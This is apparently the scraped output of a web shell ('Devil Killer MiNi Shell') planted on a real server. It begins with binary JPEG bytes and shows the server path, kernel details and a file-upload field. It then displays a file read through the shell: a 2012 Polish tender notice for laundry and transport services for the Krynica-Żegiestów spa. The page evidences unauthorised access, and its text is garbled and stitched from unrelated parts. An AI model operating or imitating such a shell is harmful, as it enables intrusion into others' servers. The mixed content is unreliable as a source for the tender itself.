JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/60895-N-2012.html

<p class="kh_header"><b>Krynica: Kompleksowe świadczenie usług pralniczych wraz z transportem dla  Uzdrowiska Krynica - Żegiestów S.A. w Krynicy Zdroju ul. Nowotarskiego 9/4</b><br>
<b>Numer ogłoszenia: 60895 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Krynica - Żegiestów S.A. , ul. Nowotarskiego 9/4, 33-380 Krynica, woj. małopolskie, tel. 018 4712395, faks 018 4715081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ukz-uzdrowisko.krynica.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe świadczenie usług pralniczych wraz z transportem dla  Uzdrowiska Krynica - Żegiestów S.A. w Krynicy Zdroju ul. Nowotarskiego 9/4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa usługa prania bielizny szpitalnej, sanatoryjnej, odzieży i pozostałego asortymentu, o którym mowa w pkt. I.1.4.g.
Usługa obejmuje:
a) dezynfekcję, pranie, suszenie, maglowanie lub prasowanie, składanie oraz sortowanie,
b) krochmalenie odzieży personelu medycznego oraz asortymentu uzgodnionego przez Zamawiającego tj. obrusy, bieżniki, serwetki,
c) czyszczenie chemiczne, naprawy szwalnicze (szycie, reperacja itd.),
d) odbiór asortymentu brudnego przez Wykonawcę, załadunek i transport, rozładunek czystego asortymentu do magazynu bielizny czystej Zamawiającego na koszt Wykonawcy, we wskazanych przez Zamawiającego punktach: NDZ, NŁM, SŁM, Patria, Pijalnia, Zakład Produkcji Wód
2.Orientacyjna ilość bielizny do prania to 37 000 kg, miesięczna ilość to 3 084 kg. Faktyczną ilość prania określać będą każdorazowo zamówienia.
Możliwy wzrost  lub zmniejszenie zapotrzebowania na usługi pralnicze może się wahać w granicach +/- 20 %. Z tego względu  Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia w określonej powyżej granicy.
3.Wymagania Zamawiającego:
a) odbiór bielizny brudnej i dostawa czystej bielizny odbywać się będzie codziennie w dni robocze od  8 - 12 i w razie potrzeby transportem Wykonawcy. Pranie bielizny szpitalnej, sanatoryjnej oraz dezynfekcja odbywać się będzie w każdy dzień roboczy w pralni Wykonawcy.
b) każdorazowe przekazanie brudnej bielizny musi być potwierdzone pisemnie przez upoważnionych przedstawicieli stron na dowodzie-druku przekazania, zawierającym specyfikację asortymentowo - ilościową, w przypadku odzieży roboczej, ochronnej listy imiennej
c) Wykonawca zobowiązuje się wykonywać usługi pralnicze zgodnie ze złożonymi przez   Zamawiającego zapotrzebowaniami, które będą składane na 24 godziny przed terminem odbioru bielizny i odzieży do prania.
d) transport brudnej bielizny odbywać się będzie samochodem zamykanym i przeznaczonym tylko do transportu brudnej bielizny. W przypadkach kiedy transport odbywa się jednym samochodem, najpierw dowożona jest czysta bielizna, następnie zabierana brudna lub samochodem posiadającym podzieloną komorę załadunkową  zabezpieczającą przed kontaktem bielizny brudnej i czystej;
e) Wykonawca zobowiązany jest do przetransportowania asortymentu z magazynu brudnej bielizny do samochodu;
f) Wykonawca odpowiada za przyjęty ładunek brudnej bielizny szpitalnej, sanatoryjnej z chwilą jego pobrania i  załadunku;
g) Wykonawca jest zobowiązany zabezpieczyć ładunek brudnej bielizny szpitalnej, sanatoryjnej przed uszkodzeniem, dostępem osób trzecich, wpływem czynników zewnętrznych oraz wpływem ładunku na otoczenie;
h) Wykonawca zaopatruje nieodpłatnie Zamawiającego w mocne worki nieprzemakalne ( w ilościach niezbędnych), o wymiarach ok. 70x110cm tj. pojemności ok. 120 l oznakowane napisem: UKŻ S.A Krynica Zdrój...(komórka organizacyjna) do zbierania brudnej bielizny. Worki winny być oznakowane tak aby można było oddzielić bieliznę zgodnie z wymogami sanitarno-epidemiologicznymi tj. bieliznę skażoną -worki z oznaczeniem czerwonym, a bieliznę używaną worki z oznaczeniem w kolorze białym (lub innym jasnym) natomiast odzież robocza z oznakowaniem w kolorze  niebieskim.
4. Do obowiązków Wykonawcy należy:
a) wykonanie usługi zgodnie z obowiązującymi przepisami,
b) pranie bielizny różnorodnej  pod względem zabrudzenia, skażenia, gabarytów i koloru. 
Wykonawca zobowiązany jest do respektowania warunków prania określonych przez producenta odzieży. 
c) Wykonawca gwarantuje nie mieszanie bielizny Zamawiającego z bielizną z innych placówek
d) proces prania bielizny szpitalnej, sanatoryjnej powinien odbywać się zgodnie z obowiązującymi przepisami  i procedurami  gwarantującymi wysoką jakość wypranej odzieży zarówno pod względem mikrobiologicznym jak i higienicznym;
e) stosowane środki w procesie odkażania, prania i wybielania nie mogą niszczyć tkaniny, nie mogą zawierać fosforanów oraz muszą być przeznaczone do stosowania w Podmiotach Leczniczych
f) Środki piorące i dezynfekcyjne powinny posiadać wymagane atesty i certyfikaty, oraz gwarantować również technologię dezynfekcji niskotemperaturowej w procesie prania (temperatura nie większa niż 65 C), moduł załadunku bielizny (w kg) w stosunku do wody 1:4 lub 1: 5 co pozwala na właściwą jakość prania   nie powodując przyspieszonego zużycia bielizny.
g) Środki piorąco - dezynfekcyjne przeznaczone do dezynfekcji bielizny powinny posiadać wpis w Urzędzie Rejestracji Produktów Biobójczych lub pozwolenie Ministra Zdrowia na obrót produktem biobójczym lub świadectwo dopuszczenia do obrotu PZH, zgodnie z Ustawą z dnia 13 września 2002r o produktach biobójczych (tekst jednolity Dz. U. 2007 nr 39 poz. 252).
h) maszyny i urządzenia używane w procesie prania muszą być w dobrym stanie technicznym oraz muszą posiadać znak CE (jeśli nie to muszą być dostosowane do obowiązujących przepisów);
i) krochmalenie odzieży personelu medycznego oraz asortymentu uzgodnionego przez   Zamawiającego z Wykonawcą  (np. obrusy, serwety, serwetki);
j) maglowanie i prasowanie bielizny należy prowadzić w sposób ograniczający jej kontakt z innymi powierzchniami i czynnikami, które mogłyby spowodować jej skażenie lub zabrudzenie;
k) Wykonawca powinien oddzielić rzeczy uszkodzone i naprawić je tzn. przeszyć na maszynie szwem ciągłym, naprawić szwy boczne, zszyć rozdarte części bielizny, wszyć suwak, gumki uzupełnić troki, napy, guziki itp. ponosząc koszty potrzebnych użytych materiałów)
l) w przypadku kiedy odebrana przez Zamawiającego bielizna szpitalna, sanatoryjna nie spełnia jego wymagań (np. pranie brudne, mokre, wilgotne itp.), Zamawiający odnotowuje ten fakt w dokumencie zdawczo-odbiorczym bielizny odebranej, co będzie równoznaczne z wypełnieniem kwitu reklamacyjnego - wg wzoru stanowiącego załącznik do umowy
ł) w przypadku nie wywiązywania się z terminów świadczonej usługi w zakresie odbioru brudnej i dostarczenia czystej bielizny jak również niedostatecznej jakości pranego asortymentu, Zamawiający ma prawo do wnoszenia reklamacji na piśmie za pomocą faksu, e-mail lub osobiście,
m) wszelkie reklamacje będą zgłaszane do 3 dni roboczych od odbioru przedmiotu zamówienia,
n) Wykonawca ma obowiązek natychmiastowej odpowiedzi na w/w reklamację w formie pisemnej
o) Wykonawca ponosi odpowiedzialność za rzeczy uszkodzone w czasie prania, maglowania i prasowania, jak również w czasie transportu. Jeśli uszkodzenie ze względów funkcjonalnych i/lub estetycznych nie pozwala na dalsze użytkowanie bielizny, Wykonawca ponosi koszty związane z jej odkupieniem.
p) Wykonawca ponosi odpowiedzialność za utratę lub uszkodzenie rzeczy będących przedmiotem usługi i zobowiązuje się do odkupienia zniszczonej lub zagubionej bielizny w ciągu 5 dni od daty protokołu zdawczo - odbiorczego, w którym został ujawniony jej brak lub uszkodzenie,
r) ponoszenie pełnej odpowiedzialności za właściwą i terminową realizację usługi pralniczej  i transportu bielizny wobec Zamawiającego oraz organów kontroli, odpowiedzialność za czystość mikrobiologiczną pranej bielizny,
s) ścisłe przestrzeganie godzin odbioru brudnej i dostawy czystej bielizny,
5. Dostawa i transport czystej bielizny:
a) dostawy czystej bielizny codziennie w dni robocze od 8 - 12 środkiem transportu  Wykonawcy;  
b) czysta bielizna powinna być szczelnie zapakowana w worki foliowe (przeźroczyste) a w czasie   transportu w dodatkowy worek tak aby zabezpieczyć bieliznę przed powtórnym zabrudzeniem;
c) fartuchy i mundurki personelu powinny być prasowane i dostarczone w stanie powieszonym  i zafoliowane;
d) czysta bielizna będzie dostarczana posegregowana asortymentowo w opakowaniach
- zabezpieczających przed wtórnym zabrudzeniem (skażeniem)
- umożliwiających odbiór rodzajowo-asortymentowy bez konieczności otwierania opakowania oraz potwierdzenie, że jest bielizną Zamawiającego.
Jednostki pakowe  zostaną ustalone między stronami;
e) każdorazowe przekazanie  czystej bielizny musi być potwierdzone pisemnie przez upoważnionych przedstawicieli stron na dowodzie/druku przekazania zawierającym specyfikację asortymentowo-ilościową, a w przypadku odzieży ochronnej i roboczej listy imiennej;
f) Wykonawca zobowiązany jest do przetransportowania bielizny z samochodu
do magazynu bielizny czystej;
g) Czas wykonywania usługi pralniczej nie powinien przekraczać 24 godzin, realizacja usługi określonej jako pilna nie dłużej niż 8 godzin, od momentu odbioru od Zamawiającego brudnej bielizny do momentu przekazania do magazynu bielizny czystej.
h) Zamówienia na usługi wykonywane w trybie pilnym nie mogą przekroczyć w ciągu trwania umowy 5% ilości określonej w pkt.3.
i) Ocena stanu bielizny kwalifikującej się do likwidacji będzie dokonywana przez odpowiednie służby Zamawiającego.
j) Wydzielenie bielizny do naprawy przez Wykonawcę w tym m. in. przyszywanie guzików, cerowanie, łatanie, doszywanie troczków itp. naprawa i zwrot naprawionej bielizny, pościeli oraz odzieży w ciągu 24 godzin.
6. Pozostałe warunki:
a) Zamawiający zapewnia na terenie Uzdrowiska odpowiednie pomieszczenia do przekazywania  i składowania bielizny czystej i brudnej oraz wyznaczy pracownika do współpracy z Wykonawcą;  
b) bielizna szpitalna, sanatoryjna jest odbierana w rozliczeniu sztukowym i oddawana Uzdrowisku  w tym samym systemie, natomiast rozliczenie finansowe za bieliznę następuje w przeliczeniu na kilogramy bielizny czystej, odzieży ochronnej i roboczej wg wzoru protokołu zdawczo - odbiorczego zlecenia prania stanowiącego załącznik do umowy 
c) organizacja transportu, załadunku i rozładunku bielizny szpitalnej, sanatoryjnej będzie  gwarantowała nie krzyżowanie się dróg czystych i brudnych oraz będzie wykluczała kontakt czystej  bielizny z brudną;
d) Wykonawca posiada  aktualną opinię i zezwolenie właściwego inspektora sanitarnego na usługi pralnicze bielizny szpitalnej, sanatoryjnej w tym bielizny skażonej oraz opinię właściwego inspektora sanitarnego dopuszczającą środki transportowe do świadczenia usługi przewozu bielizny szpitalnej, sanatoryjnej
e) Wykonawca ponosi koszty związane z:
-zakupem środków piorących i dezynfekcyjnych, wybielających dopuszczonych do obrotu i stosowania w Podmiotach leczniczych,
-transportem (w tym zabezpieczenia bielizny na czas transportu-worki, folia)
-naprawą uszkodzonej bielizny, odzieży
-odkupieniem rzeczy zagubionych, zniszczonych 
-dostarczeniem druków wymaganych do rozliczenia z Uzdrowiskiem (wzory druków 
w załącznikach) 
f) Wykonawca na czas trwania umowy wyposaży Uzdrowisko (Zamawiającego) w wózki (stelaże) dwukomorowe do zbierania brudnej bielizny (używanej i skażonej)  w ilości szt. 5
g) Wykonawca ponosić będzie odpowiedzialność materialną za bieliznę od chwili jej przyjęcia do prania do chwili jej zwrotu po wykonaniu usługi.
h) W razie awarii urządzeń Wykonawca zabezpieczy wykonanie usługi - posiadanie drugiego obiektu wykonawczego lub umowy z innym Wykonawcą posiadającym dopuszczenie do prowadzenia działalności gospodarczej w zakresie prania bielizny szpitalnej, sanatoryjnej.
7. Ocena stanu higieny:
a) Wykonawca, na prośbę Zamawiającego, dostarczy kopię dokumentacji z kontroli   przeprowadzonych przez właściwą stację sanitarno-epidemiologiczną  oraz  badań i czynności z zakresu kontroli jakości wykonywanej usługi np. badań mikrobiologicznych wypranej bielizny, odzieży, samochodu;
b) Wykonawca zobowiązany jest na bieżąco dbać o właściwy stan sanitarno-epidemiologiczny pomieszczeń pralni, otoczenia oraz środków transportu stosując odpowiednie procedury.
Zamawiający zastrzega sobie prawo do wykonania auditów u Wykonawcy;
c) Zamawiający wymaga by Wykonawca dysponował oddzielnym środkiem transportu brudnej i czystej bielizny lub środkami transportu posiadającymi szczelną i podzieloną komorę załadunkową tak, by bielizna czysta nie miała możliwości jakiegokolwiek kontaktu z bielizną brudną. Środki transportu powinny być zaakceptowane przez Państwową Stację Sanitarno - Epidemiologiczną.
d) Wykonawca ponosić będzie odpowiedzialność za wykonywane usługi pralnicze w zakresie jakości  i zgodności z wymogami sanitarnymi wobec organów kontroli (Stacja Sanitarno - Epidemiologiczna, PIP, BHP i epidemiologia szpitalna). Zamawiający zastrzega sobie prawo wglądu w dokumenty potwierdzające w/w zgodność.

Wykonawca zobowiązuje się do zachowania na niezmienionym poziomie cen określonych w ofercie przetargowej przez cały okres obowiązywania niniejszej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4, 50.83.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu. Wykonawca przedłoży  jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie doświadczenie Wykonawca musi wykazać, że zrealizował lub realizuje z należytą starannością min. 3 usługi odpowiadające swoim rodzajem(usługi pralnicze wraz z transportem)  złożonej przez Wykonawcę ofercie,  o wartości (każda z tych usług)  co najmniej 100.000,00 zł. brutto (słownie: sto tysięcy złotych) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej wartości, przedmiotu, daty wykonania i odbiorców oraz załączenia dokumentu potwierdzającego, że dostawy te zostały wykonane należycie ( potwierdzeniem mogą być referencje). 
Ocena spełnienia warunków nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie III.4.1.pkt.1. Ocena nastąpi w oparciu  o formułę spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu. Wykonawca przedłoży  jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu. Wykonawca przedłoży  jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie Zamawiający nie formułuje szczegółowych warunków udziału w postępowaniu. Wykonawca przedłoży  jedynie oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Aktualną opinię właściwego Państwowego Inspektora Sanitarnego na świadczenie usług pralniczych bielizny szpitalnej w tym bielizny skażonej.
 
2)Aktualną opinię na samochody do przewozu bielizny czystej i brudnej wydaną
przez właściwego Państwowego Inspektora Sanitarnego.

Ocena nastąpi w oparciu o formułę spełnia/ nie spełnia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis dotyczący terminów ważności dokumentów stosuje się odpowiednio</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
